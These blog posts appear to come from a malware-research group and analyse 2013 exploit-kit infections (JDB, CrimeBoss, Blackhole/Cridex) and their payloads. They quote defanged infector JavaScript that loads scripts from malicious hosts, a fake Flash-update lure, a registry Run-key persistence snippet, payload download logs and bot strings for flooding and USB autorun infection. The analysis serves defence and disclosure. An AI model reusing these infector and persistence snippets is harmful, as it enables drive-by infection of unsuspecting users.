Thursday, January 31, 2013

Peeking at Anon JDB Exploit Kit infector (212.7.192.100/jdb/inf.php?id=xxx) with AV verdicted called "DarkKomet", but actually a NayraBOT/AryaNBot an IRC Backdoor USB Worm 

Background

There are good investigations that make you feel good after decoding everything up, 
and there are also some incompleted ones, like this story. Which is really annoying 
me in the end, but I decided to release it anyway, for sharing information purpose.

Why this wasn't good? Actually is not *that* bad, I got the exploit kit script 
figured well, but missing the JAR exploit infector file thus somehow the 
payload (definitely malicious) won't infect my PC eventhough I tried it in many ways.
So there were a LOT of things to do & time to consume to make this post..
[NEW!] - With the help of other researchers we fully figured the 
payload w/details -->>[HERE]
[NEW!] - The JAR details of this exploit kit is written in
the next post -->>[HERE]

These are the set of JDB infection at our first attempt:


It all started from infected sites with IFRAME contains "jdb/inf・php?id=" strings.
Found it UP AND ALIVE in many online sites in internet now, i.e.:
Several Facebook's posts like:

Developer Forum's posts like:

An injected code in blog sites like:

Also found it as injected code in gamer sites:

Or some code pasted in Paste posts like:

Shortly, I searched about 23 sites contains this infected code before I call it a day, 
if you want to confirm this injections please check it by google for "jdb/inf・php?id="
strings.(Thank's to @Hulk_Crusader for finding the infector tips in internet)

These injected url leads to the same infector site at the below url:

212,7.192.100/jdb/inf.php?id=xxx

If we check into URLquery will show the below result:
(Thank's for @MalwareSigs for the url hint which was perfectly matched to the case!)

Discussing this matter with our team-mate @Hulk_Crusader, we found out 
these are the infection of JDB Exploit Kit. 
Honestly, we really have no idea what this is all about except some reference
in the internet, so after seeing Hulk's rage is increased (see below)..

.. I decided to investigate this further. Here we go:


Landing Page

Every Exploit Pack has different works, so does this one. And this one has its 
unique ways. I accessed the two below confirmed infectors from URLQuery: (thanks Hulk!)

212,7.192.100/jdb/inf,php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
212,7.192.100/jdb/inf,php?id=454897430d071f42dc980fcfe917c75a

And they worked in different way, even the request was sent by a simple defined
static conditions: "With Java and without Java"

While accessing the 1st url, with or without Java I received below script response:

And I have response of landing page script if accessing the 2nd URL "with Java":

↑This is how we got in touch with the landing page of JDB Exploit Kit.

So how is it goes if we got infected?
I tried to infect my self by using the landing page, and it goes like this:

I tried to connect to one of URL above & having a pop up asking for Adobe Flash update:

In the Java console I found the access for java classes which was executed as per logged below:

You maybe have different response depends on your browser, but If we use the latest IE + Java in 
the browser the response might look like pic below:

Back to the code, in either the 1st or 2nd accessed URL above this javascript 
was executed:

If we press the OK button the malware file is starting to be downloaded.
Let's make sure that the url is still valid...

--2013-01-30 15:45:05--  
h00p://212,7.192.100/jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a
seconds 0.00, Connecting to 212,7.192.100:80... seconds 0.00, connected.
  :
GET /jdb/lib/adobe.php?id=454897430d071f42dc980fcfe917c75a HTTP/1.0
Referer: (Put the URL of infected site here..)
User-Agent: MalwareMustDie rocks JDB now!
Host: "212,7.192.100"
HTTP request sent, awaiting response...
   :
HTTP/1.1 200 OK
Date: "Wed, 30 Jan 2013 06:45:52 GMT"
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename="Adobe-Flash_WIN.exe"
Connection: close
Content-Type: application/octet-stream
  :
200 OK
Length: "unspecified [application/octet-stream]"
Saving to: "Adobe-Flash_WIN.exe"
2013-01-30 15:45:08 (99.0 KB/s) - "Adobe-Flash_WIN.exe" saved [83968]

And this is the actual file looks like:

↑What was popped up as Adobe Updater looks like "Image Extractor" now :-)

The point of this section is both Java or not Java supported browser is being 
targeted by JDB exploit kit. Let's move on. We'll go back to this payload analysis later..

Now let's see the detail code in the landing page.

JDB uses the PluginDetect-base java script, a well-customized one. 
I hardly recognize the base if I didn't look at it very well.
In a glimpse you'll probably will think that you are seeing Google page source code..
I'll explain to you why.

We can see the  PluginDetect typical code traces like below:

"The usage of the alphabetical values of PluginDetect.."
// You'll se this very much scattered in codes..
 (function () {
     var b, c, d, e;
     function g(a, f) {...
       :

"The way of PluginDtect Define the DOM/XML Component of IE:"

(function () {
    var a, b = "1";
    if (document && document.getElementById) if ("undefined" != typeof XMLHttpRequest) b = "2";
    else if ("undefined" != typeof ActiveXObject) {
        var c, d, e = ["MSXML2.XMLHTTP.6.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP"];
        for (c = 0; d = e[c++];) try {
            new ActiveXObject(d), b = "2"
        } catch (f)...

(etc..etc..)

JDB EK scattered the infector script between CSS & HTML like the below structure,
PS: as per mentioned, it required Java installed for folowing this scheme..

"Infector script came up first..."
<script ..
setTimeout("alert('Adobe Flash must be updated to view this, please install the latest version!'...;
setTimeout("location.href = ...

"Continued by the java applet..."
<applet width='0px' height='0px' 
    code="GAME,class" archive="data・php?id=xxxx....
"
"HTML starts, following by a redirector script code of faking Google page.."
<html itemscope="itemscope" itemtype="http://schema.org/WebPage">
<head>
    <meta itemprop="image" content="/images/google_favicon_128.png">
    <title>Google</title>
    <script>
      (function () {
       window.google = {
       kEI: "xcrhUNW6MpHBswbloYHoBA",
       getEI: function (a) {
           for (var b; a && (!a.getAttribute || !(b = a.getAttribute("eid")));) a = a.parentNode;
            return b || google.kEI

"Some obfuscation detected here.."
 kEXPI: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
 kCSI: {
     e: "17259,39523,39976,4000116,4000473,4000566,4000955,4001..."
     ei: "xcrhUNW6MpHBswbloYHoBA"
              :
"..Following by PluginDetct customized.. with all stuffs -
was related/linked with the Google...
no wonder many automation got fooled by this
and think it was google redirection page.."

<script> (
 function () {
    try {
      var e = !0,
          h = null,
          j = !1;
      var aa = function (a, b, c, d) {
          d = d || {};
          d._sn = ["cfg", b, c].join(".");
          window.gbar.logger.ml(a, d)
      };
      var m = window.gbar = window.gbar || {}, 
        p = window.gbar.i = window.gbar.i || {}, ba;
       :

The full "neutralized" landing script is-->>[HERE]
Please see the code in the pastebin well, and you'll see many Google API & calls used.
Conclusion is, you should be aware of which are the real Google page & which are 
not if you meet this kind of exploit kit. 

What looks like Google maybe is not real Google.
PS: This "faking" scheme actually can be implemented in many portals or SNS sites too..
So let&s be aware of this trend.
Below is the snapshot of fake Google page generated by this landing page:

In additional,I studied other case which were reported in URLquery here -->>[URLquery] too.
↑In that case user were redirected perfectly to the Google portal (http://www.google.no/),
with also generated javascript eval() obfuscated hex values (pls expand the bottom parts)
I tried to decode it in some ways it's meaningful.. and still not making any sense..



JAR Infector

It has the JAR infector as per above landing page mentioned "class.class" or "GAME.class" , 
which are referred to the download url as per mentioned applet tag mentioned above,
(at the beginning of the landing page script)
Nd it pointed to the part below:

GAME.class' archive='data.php?id=0e60198f77a4c5f78f2d8fb8fa7e5776
Note: Due to some technicalities in fetching this file, I will add the JAR analysis later..
The file is there. But always returning 0 byte, as per logged below:

HTTP/1.1 200 OK
Date: Wed, 30 Jan 2013 13:39:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.20
Content-Disposition: inline; filename=0e60198f77a4c5f78f2d8fb8fa7e5776.jar
"Content-Length: 0  <========="
Connection: close
Content-Type: application/octet-stream
  :
200 OK
Length: 0 [application/octet-stream]
The JAR adventure of this Anon JDB EK is longer
than I thought, so it will write it in the next post, stay tune!
[NEW] The JAR & its payload report is here-->>[HERE]


Payload

OK, we got one payload in this first attempt. And in our next post you can see
much more payloads dropped from the JARs file, let's continue w/this payload:
Looks like already uploaded into internet 5(five)hours ago,
AV products are detecting this as a DarkKomet trojan, a backdoor downloader.
Below is Virus Total Scan Details:
SHA1:      e5d2da5b3546f24e1510f8ae53e0d05ce342c806
MD5:       10c8559523f8f5787daa3dc8e47b64e1
File size: 82.0 KB ( 83968 bytes )
File name: Adobe-Flash_WIN.exe
File type: Win32 EXE
Tags:      peexe
Detection: 15 / 46
Analysis date: 2013-01-30 06:42:34 UTC ( 5 hours, 40 minutes ago )
URL: https://www.virustotal.com/latest-scan/90359af6d9dafee904552f17318cee1c26d7bd68db30fae362b69c4693d57aa1

"Malware name:"
F-Secure                 : Gen:Variant.Zusy.33769
DrWeb                    : BackDoor.HostBooter.3
GData                    : Gen:Variant.Zusy.33769
AhnLab-V3                : Backdoor/Win32.DarkKomet
ESET-NOD32               : a variant of MSIL/Injector.AZM
VBA32                    : TScope.Trojan.MSIL.gen
TrendMicro-HouseCall     : TROJ_GEN.F4AHZAM
Avast                    : Win32:Malware-gen
BitDefender              : Gen:Variant.Zusy.33769
Agnitum                  : Trojan.Scarsi!W0yI8SvDe54
Malwarebytes             : Trojan.Downloader.ED
Ikarus                   : Backdoor.Win32.DarkKomet
Fortinet                 : MSIL/Dropper.CSS!tr
AVG                      : Dropper.Generic7.ATKY
Panda                    : Trj/Dtcontx.A

OK, AV signature Said DarkKomet, so let's take a look closer...
Remember you should see yourself it to understand what it really is.
The binary looks like this:

Compilation timedatestamp: 2013-01-18 21:26:40
Compiled by: Microsoft Visual Basic .NET
Target machine: 0x14C (Intel 386)
Entry Point at:  0x64ee
Virtual Address is 0x4080ee
Sections:
   .text 0x2000 0x60f4 25088  // no packer detected
   .sdata 0xa000 0xb0 512
   .rsrc 0xc000 0xdd00 56832
   .reloc 0x1a000 0xc 512
"HEX snips.."
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 04 00 10 BE F9 50 00 00 00 00    PE..L......P....
0090   00 00 00 00 E0 00 02 01 0B 01 0B 00 00 62 00 00    .............b..
00A0   00 E2 00 00 00 00 00 00 EE 80 00 00 00 20 00 00    ............. ..
00B0   00 A0 00 00 00 00 40 00 00 20 00 00 00 02 00 00    ......@.. ......
00C0   04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00    ................
00D0   00 C0 01 00 00 04 00 00 00 00 00 00 02 00 40 85    ..............@.
00E0   00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00    ................
00F0   00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00    ................
0100   A0 80 00 00 4B 00 00 00 00 C0 00 00 00 DD 00 00    ....K...........

Interesting findings in binary;

A compilation trace...
0x006634   C:\Users\USER\Documents\Mallette magique\stubs\
           Image Extract v1.3\Image Extract v1.3
           \obj\x86\Release\Image Extract v1.3.pdb

Looks it drops this file...

0x00509D   c:\MyTest.txt

The binary contains these "interesting" words :-)

0x0050C7   Blues           0x00561D   Folk/Rock         0x005369   Meditative           0x005871   Tango
0x0050D3   Classic Rock    0x005631   National Folk     0x00537F   Instrumental Pop     0x00587D   Samba
0x0050ED   Country         0x00564D   Swing             0x0053A1   Instrumental Rock    0x005889   Folklore
0x0050FD   Dance           0x005659   Bebob             0x0053C5   Ethnic               0x00589B   Ballad
0x005109   Disco           0x005665   Latin             0x0053D3   Gothic               0x0058A9   Power Ballad
0x00511F   Grunge          0x005671   Revival           0x0053E1   Darkwave             0x0058C3   Rhythmic Soul
0x00514B   Metal           0x005681   Celtic            0x005419   Electronic           0x0058DF   Freestyle
0x005157   New Age         0x00568F   Bluegrass         0x005443   Eurodance            0x0058FD   Punk Rock
0x005167   Oldies          0x0056A3   Avantgarde        0x005457   Dream                0x005911   Drum Solo
0x005175   Other           0x0056B9   Gothic Rock       0x005463   Southern Rock        0x005925   A Cappella
0x005199   Reggae          0x0056D1   Progressive Rock  0x00547F   Comedy               0x005955   Dance Hall
0x0051B1   Techno          0x0056F3   Psychedelic Rock  0x005497   Gangsta              0x005973   Drum & Bass
0x0051BF   Industrial      0x005715   Symphonic Rock    0x0054A7   Top 40               0x0059A5   Hardcore
0x0051D5   Alternative     0x005733   Slow Rock         0x0054B5   Christian Rap        0x0059B7   Terror
0x0051F5   Death Metal     0x005747   Big Band          0x0054D1   Pop/Funk             0x0059C5   Indie
0x00520D   Pranks          0x005759   Chorus            0x0054E3   Jungle               0x0059D1   BritPop
0x00521B   Soundtrack      0x005767   Easy Listening    0x0054F1   Native American      0x0059E1   Negerpunk
0x00524B   Ambient         0x005785   Acoustic          0x005511   Cabaret              0x0059F5   Polsk Punk
0x00526F   Vocal           0x005797   Humour            0x005521   New Wave             0x005A15   Christian Gangsta Rap
0x00527B   Jazz Funk       0x0057A5   Speech            0x005533   Psychadelic          0x005A41   Heavy Metal
0x00528F   Fusion          0x0057B3   Chanson           0x005555   Showtunes            0x005A59   Black Metal
0x00529D   Trance          0x0057C3   Opera             0x005569   Trailer              0x005A71   Crossover
0x0052AB   Classical       0x0057CF   Chamber Music     0x005589   Tribal               0x005A85   Contemporary Christian
0x0052BF   Instrumental    0x0057EB   Sonata            0x005597   Acid Punk            0x005AB3   Christian Rock
0x0052E3   House           0x0057F9   Symphony          0x0055AB   Acid Jazz            0x005AD1   Merengue
0x0052F9   Sound Clip      0x00580B   Booty Bass        0x0055BF   Polka                0x005AE3   Salsa
0x00530F   Gospel          0x005821   Primus            0x0055CB   Retro                0x005AEF   Thrash Metal
0x00531D   Noise           0x00582F   Porn Groove       0x0055D7   Musical              0x005B09   Anime
0x005329   AlternRock      0x005847   Satire            0x0055E7   Rock & Roll          0x005B1F   Synthpop
0x00535D   Space           0x005855   Slow Jam          0x0055FF   Hard Rock

If it is a DarkKomet trojan, it supposed opening backdoor &
making calls to the mothership. So I wonder what exactly *this* DarKomet will do...
Maybe if we lucky we can see the location of the mothership too.
Well, I run this payload like below snapshot to see its malicious acts:

As per expected, it dropped the txt file in root folder, so far so good..

But too bad,↑the file is containing zero byte..
I run and check it here and there, like:

Well, it run. Yes. but no malicious act detected in my test :-(
It runs, for say 10 seconds then exit 0.
It doesn't actually opening any network socket for backdoor nor making internet connection..
Strange.. Only in the memory I saw a lot of suspicious calls like:

0x4DC446      http\shell\open\command
0x4DE1CE      http://
0x30E16E      WWW-AuthenticateHTTP/
0x2DA392      HTTP/1.1 200 OK
0x2D2A5A      HttpListenerContext#
0x2D2DDA      httpListener#
0x2D2E76      httpContext#
0x2D2F2E      HTTP Method:
0x383E72      HTTP_SEND_REQUEST_FLAG_MORE_DATA
0x383E96      HTTP_RECEIVE_REQUEST_FLAG_COPY_BODY
0x383EBA      HTTP_SEND_RESPONSE_FLAG_MORE_DATA
0x383EDE      HTTP_SEND_RESPONSE_FLAG_RAW_HEADER

↑So it supposed to start connecting internet but it doesn't.. no PCAP.
At that time, the suspicious traces I found is at the memory dump, and 
some operation in IE cache in windows' registry.. it's really annoying.

[NEW!] After a while I was contacted by our researcher friend: 
Matt of @undeadsecurity , which explained he got the PCAP. 
you can see Matt's post here -->>[Link]
(thank's for the good work!--> @undeadsecurity)

Matt's recorded below traffic:  (the pic below belongs to Matt/@undeadsecurity)

Which we can eliminate the broadcast address of 10.74.4.255 and also
eliminate AKAMAI network from the list, what's left in the traffic (in PCAP)is
the malware communication:

↑You see DNS query to adultsirc.no-ip.org + some connect tries to IRC 6667 port.

At the time I saw this I was decided to drop the verdict of AV products 
which saying about Trojan DarkKomet etc etc (which you should too!).
Still, I couldn't make it run it in my system  so I took into Matt's report 
further, and it was mentioned this IMPORTANT trails:

on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "jeQodSivaa"
strValue = """C:\Users\Admin\AppData\Roaming\pbYRmjBa3B\L4b1HYCWGL.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue

Since I didn't have more clue, ↑this is my base to start searching
and asking more for references.

A while ago I received a very good advise in kernel mode to strip .NET - 
onfuscator trails in the binary. (thank's to @Rinn of kernelmode).
Previous words are actually the .NET obfuscator:

0x0050D3   Classic Rock    0x005631   National Folk     0x00537F   Instrumental Pop     0x00587D   Samba
0x0050ED   Country         0x00564D   Swing             0x0053A1   Instrumental Rock    0x005889   Folklore
0x0050FD   Dance           0x005659   Bebob             0x0053C5   Ethnic               0x00589B   Ballad

So all we do is remove it & assemble the binary then re-checking 
the insides one more time to find the below malicious operation clues:

UDP Flooding/DoS attack operation (Saw Hulk's face is getting greener here...)

0x001600   Flooding: "%s:%d", Delay: "%d(ms)", For "%d" Seconds
0x0015E8   %d%d%d%d%d%d%d%d
0x001590   %s %s %s
0x001574   %s %s :[AryaN]: %s
0x00156C   %s %s
0x001558   %s "" "%s" :%s
0x0015A4   Finished Flooding "%s:%d"
0x0015C4   Terminated UDP Flood Thread

Bot Killer feature... (I don't have a heart to se Hulk's face at this point..)

0x000768   Botkiller
0x000774   Successfully Killed And Removed Malicious File: "%s"
0x000800   Usage: %s IP PORT DELAY LENGTH
0x000828   Failed To Start Thread: "%d"
0x00084C   Failed: Mis Parameter

Found the below URL:

0x000C84   h00p://api.wipmania.com/

Accesssing removable drives + infecting with autorun.inf w/autostart:
(you really don't want to know what's Hulk did at this point..)

0x0017A4   LNK Infected Removable Device: "%s\", Created: "%d" Lnk Files
0x0019B4   AutoRun Infected Removable Device: "%s\"
  :
0x0014BC   Software\Microsoft\Windows\CurrentVersion\Run
0x001640   %temp%\deletethis.exe
0x001674   Removable_Drive.exe
0x0016BC   %s\{%s-%s}
0x0016D8   /k "%s" Open %s
0x001700   %windir%\System32\cmd.exe
0x001740   %s\Removable_Drive.exe
0x001778   %s\%s
0x001788   %s\%s.lnk
0x001990   %s\autorun.inf

Self-update feature...

0x000A18   Update Complete, Uninstalling
0x000A3C   Successfully Executed Process: "%s"
0x000A68   Failed To Create Process: "%s", Reason: "%d"
0x000AA0   Successfully Replaced AryaN File With Newly Download File, Update Will Take Affect On Next Reboot
0x000B48   Successfully Downloaded File To: "%s"
0x000B78   Downloading File: "%s"
0x000B94   Download
  :
0x000874   Failed: "%d"
0x000884   Visit
0x00088C   Failed: Mis Parameter, Usage: %s [SHOW/HIDE] [URL]
0x0008D4   Filed To Visit: "%s"
0x0008F0   Successfully Visited: "%s"
0x000920   %s #%s
0x00092C   %s %s
0x000940   Terminated WGet Thread
0x000964   Running From: "%s"
0x00097C   [%s][%s] - "%s"
0x000990   hh':'mm':'ss
0x0009E8   {%s}: %s

And some more, which lead us to the reliable references below:
Threat Expert Uploaded Ref 7 November 2011, 15:16:47-->>[HERE]
SonicWall Security Center ALERT 1 -->>[HERE]
SonicWall Security Center ALERT 2 -->>[HERE]

Research Material

Here's the 1.5MB download for the dump (snapped double data on it)-->>[HERE]
Be free to download the sample -->>[HERE] -
if you are willing to examine it yourself.
The download of PCAP I stripped from Matt's effort is-->>[HERE]
The full text of the stripped .NET obfuscator binary in text -->>[HERE]
That's it for today, the JAR used by this Exploit Kit is written in -
the next post here --->>[HERE]
#MalwareMustDie!
Posted by unixfreaxjp at

Sunday, January 27, 2013

Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector abrahamspath.org.uk//cb.php) 

Background


This post is made 100% by one of our dedicated friend @Hulk_Crusader
as the success story of a collaboration in fighting malware infector CrimeBoss. 
Thank's for Hulk for the hard work contributing his writing in our blog!
Some of the analysis is still under-going so the details will be added regularly.

On a cold January night we find The Hulk passing time surfing the internet 
when he encounters what appears to be a CrimeBoss Exploit Kit Javascript injection 
on editorialconecta[.]com: 


Why can't puny malware just leave Hulk alone????!!! 

The script on abrahamspath.org.uk/cb.php checks if Java is enabled(slightly 
sanitized with <): 

if(navigator.javaEnabled()) 
    {
    document.write(' 
    <script src="h00p://abrahamspath,org.uk//cb.php?action=jv&h=750139265">
    </script>'); }

If Java is enabled you are sent via a 302 redirect to 

boyssuitsonline、com/jex/index.php?setup=d 

where again a check for Java is made (slightly sanitized with <):

if(navigator.javaEnabled()) 
  {
    document.write('<sc' + 'ri' + 'pt src=
    "h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + 
    (Math.random()*999999 + 1)) + '" type="text/javascript" 
    charset="iso-8859-1">
    </sc' + 'ri' + 'pt>');
    }

Finally the victim is presented with the actual landing page, 
Landing page sample is here -->>[PASTEBIN]
The landing page again checks if Java is enabled.


[NEW] Analysis of Landing Page & Jars exploit used

I analyzed how the exploit worked, and noted it down.
Is a bit long so I wrote it in seperate post page-->>[HERE]

What is it with these moronz??

A malware PE binary rh.exe is downloaded from patuamusic.com,br/app/ if any 
of the Java applets successfully exploit the victim. See:
VirusTotal analysis -->>[HERE]
malwr.com analysis  -->>[HERE]

Network analysis shows a GET request for Instal.teaz from 
sonhodoseu.dominiotemporario,com/fugi/ 
This is actually another executable and appears to be a banker trojan. See:
VirusTotal analysis -->>[HERE]
malwr.com analysis  -->>[HERE]

Infection Scheme

Below we added the infection scheme graph: RRRRAAAAAAARGGHHHHH!!! The Hulk and Malware Crusaders smash the evil CrimeBoss Kit but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you and you will never know when we decide to smash you!!



*) abrahamspath.org.uk, boyssuitsonline.com, patuamusic.com.br and 
sonhodoseu.dominiotemporario.com are victimized sites & in some cases also,
to include infectious code to spread malware to visitors. 

PoC is as per below:


And so many other infections:






Research, Sources & Samples

Samples as per above sample pic, can be received here -->>[MEDIAFIRE]
Recent Infection URL of this Exploit Kit is here -->>[HERE]
Similar analysis in Japanese --->>[HERE]
The Regex to search infection hint:


Written by: @Hulk_Crusader(main) & @unixfreaxjp (reference, analysis)
#MalwareMustDie!
Posted by unixfreaxjp at

When the PWS Stealer try to improve their way to steal... a story of Cridex/PWS Fareit (via Blackhole EK at eziponoma.ru:8080)

The background

It's been while since we didn't take a look into the Cridex infection. Counting the day of we first noticed this group, until the day I write this post, it should have been almost five months yet the bad actors still do their business as usual.

The infection source is spam redirected into some redirector pages to be forwarded to the landing page of the most popular exploit kit, Blackhole, at the eziponoma.ru:8080.

I've been told by my friends to start decode to other EK too to these moronz actually is not in my first priority actually, but accidentally I know an educational institution which was injected with the redirector of this case (as per I pasted in the below tweet, thank's to @Hulk_Crusader), made me morally can't just ignore this one.

The Blackhole v2.1 Infector

After checking the landing page used, PoC↓ 

--2013-01-26 18:21:50--  "h00p://eziponoma.ru:8080/forum/links/column.php"
Resolving "eziponoma.ru"... seconds 0.00, "202.72.245.146, 94.23.3.196, 195.210.47.208"
Caching eziponoma.ru => 202.72.245.146 94.23.3.196 195.210.47.208
Connecting to eziponoma.ru|202.72.245.146|:8080... seconds 0.00, connected.
 :
GET /forum/links/column.php HTTP/1.0
Referer: h00p://www.tounichi-g.co.jp/info.htm
Host: eziponoma.ru:8080
 :
HTTP request sent, awaiting response...
 :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 26 Jan 2013 09:34:32 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: "column.php"

2013-01-26 18:21:55 (42.3 KB/s) - "column.php" saved [117752]
It looks like this structure: 
If you decode this right you'll get Blackhole2's PluginDetect 0.7.9 Script-->>[HERE]
You can use the decoding guide I wrote here -->>[HERE] to manually -
crack the download url of every exploit files & payload in there.
Shortly, here's the result of the payload/exploit components -->>[HERE]
Here's the picture as PoC:

The Cridex Infection Steps..

If you follow us in our previous blog posts -->>[HERE] about Cridex & its PWS Stealer, then you'll know that we follow this stealer in a kind of man-to-man marking, today we saw the changes in the payload as following details:

The payload looks like this:

Sections:
   UPX0 0x1000 0x1d000 0
   UPX1 0x1e000 0x18000 95232
   .rsrc 0x36000 0x1000 2048

Entry Point at 0x16bb0
Virtual Address is 0x4347b0
Packer: UPX 3.02
Compilation timedatestamp : 2011-05-17 17:20:06
Target machine: 0x14C (Intel 386
Hexed: (Thx to Joxean Koret)
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   97 FA C9 B9 D3 9B A7 EA D3 9B A7 EA D3 9B A7 EA    ................
0090   B1 84 B4 EA D6 9B B9 EA D6 97 F8 EA 9F 9B 21 EA    ..............!.
00A0   80 B8 BE EA EE 9B 26 EA BC 84 AD EA D2 9B FD EA    ......&.........
00B0   B1 84 B4 EA D7 9B 00 EA BC 84 A3 EA DF 9B 76 EA    ..............v.
 :                         :                                   :

//"ExifTool: (Thank's for Phil Harvey)
SubsystemVersion         : 4 0
InitializedDataSize      : 4096
ImageVersion             : 7 3
ProductName              : Midas
FileVersionNumber        : 10.5.0.0
UninitializedDataSize    : 118784
LanguageCode             : English (U S )
FileFlagsMask            : 0x003f
CharacterSet             : Unicode
LinkerVersion            : 7 0
FileOS                   : Windows NT 32-bit
MIMEType                 : application/octet-stream
Subsystem                : Windows GUI
FileVersion              : 10, 5, 4
TimeStamp                : 2011:05:17 18:20:06+01:00
FileType                 : Win32 EXE
PEType                   : PE32
InternalName             : Hugo
ProductVersion           : 10, 5
FileDescription          : Laos Prow Gyro
OSVersion                : 5 3
OriginalFilename         : Pcahitt exe
LegalCopyright           : Yield (2000) 2008 Caesar
MachineType              : Intel 386 or later, and compatibles
CompanyName              : Ysy
CodeSize                 : 98304
FileSubtype              : 0
ProductVersionNumber     : 10.5.0.0
EntryPoint               : 0x347b0
ObjectFileType           : Executable application

// Result in VirusTotal (Thx!)

[0x00000000:0x00400000]> !date
Sat Jan 26 18:59:52 JST 2013
[0x00000000:0x00400000]> vt
File about.exe with MD5 9fb4dd1b3e0b6002eff7e6f63a6b6d07
--------------------------------------------------------

F-Secure                 : Trojan.Agent.AYCY
DrWeb                    : Trojan.Necurs.97
GData                    : Trojan.Agent.AYCY
VIPRE                    : Trojan.Win32.Generic!BT
AntiVir                  : TR/Cridex.EB.43
TrendMicro               : PAK_Generic.001
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.ModifiedUPX.C
TrendMicro-HouseCall     : PAK_Generic.001
MicroWorld-eScan         : Trojan.Agent.AYCY
Avast                    : Win32:Rootkit-gen [Rtk]
Kaspersky                : UDS:DangerousObject.Multi.Generic
BitDefender              : Trojan.Agent.AYCY
McAfee                   : Artemis!9FB4DD1B3E0B
Malwarebytes             : Trojan.Agent.ED
Ikarus                   : Worm.Win32.Cridex
Fortinet                 : W32/Kryptik.ASU!tr
TheHacker                : Posible_Worm32
Microsoft                : Worm:Win32/Cridex.E
ViRobot                  : Trojan.Win32.S.Agent.98304.BA
ESET-NOD32               : a variant of Win32/Kryptik.ASYZ

// Readable Strings: (use od w/ascii-utf option to see this)
0x017730   XPTPSW
0x017E60   KERNEL32.DLL
0x017E6D   comdlg32.dll
0x017E7A   oleacc.dll
0x017E85   rasapi32.dll
0x017E92   setupapi.dll
0x017E9F   shlwapi.dll
0x017EAB   user32.dll
0x017EB6   winspool.drv
0x017EC3   winsta.dll
0x017ED0   LoadLibraryA
0x017EDE   GetProcAddress
0x017EEE   VirtualProtect
0x017EFE   VirtualAlloc
0x017F0C   VirtualFree
0x017F1A   ExitProcess
0x017F28   FindTextA
0x017F34   GetStateTextW
0x017F44   RasQuerySharedAutoDial
0x017F5C   CM_Get_Class_Key_NameW
0x017F74   HashData
0x017F7E   IsMenu
0x017F86   AddPrinterDriverA
0x017F9A   WinStationEnumerate_IndexedA
What this binary do? Is the below steps:

about.exe (executed via shellcode API of Exploit file →kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0))
  |
  +-CMD.EXE (via shell calls)
     |
     +--%Temp%exp%n.tmp.exe (a self copy of about.exe, executed via CMD)
         |
         +---%AppData%KB00777165.exe (downloaded trojan PWS, executed by exp%n.tmp.exe)

Some screenshots as PoC is here:


This time I provide you with the comprehension analysis of this trojan,
by using my capture data so let's analyze it together.
I was testing in some rounds so I have too many data to share.
I'll start with the trapped malware process' accessed file data, I will  pick 
some PID of the cascaded process above to understand it step by step.


File Calls


about.exe (I picked PID: 2116)
These are the list of all activity of about.exe -->>[HERE]
This process details explained the overall CMD & creation of KB00777165.exe

What cmd.exe process actually do? (I picked PID: 2152)
You'll see what cmd.exe process was actually do, with its correlation to
the temporary file exp2.tmp.bat -->>[HERE]
PS: all of these are happening in the very short time if you see 
the timestamp closely.

How about the temporary file exp%n.tmp? (I picked PID: 4028)
You can see it here -->>[HERE]
It was looping and searching for a font like crazy so I cut the log for
uploading purpose. It is operated as per expected.

So, finally KB00777165.exe (I picked up sample with PID: 1896)
The log for this was too big and many repetition, so I summarized
here --->>[HERE]


Memory Analysis

In this memory analysis I will use the about.exe and KB00777165.exe only,
since the other payloads are not so significant, or its process included in
the about.exe and KB00777165.exe already.

about.exe 

I found the below search path/file strings:

.exe
.srv
Mozilla\Firefox\Profiles
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exe
Local\XMR%08X
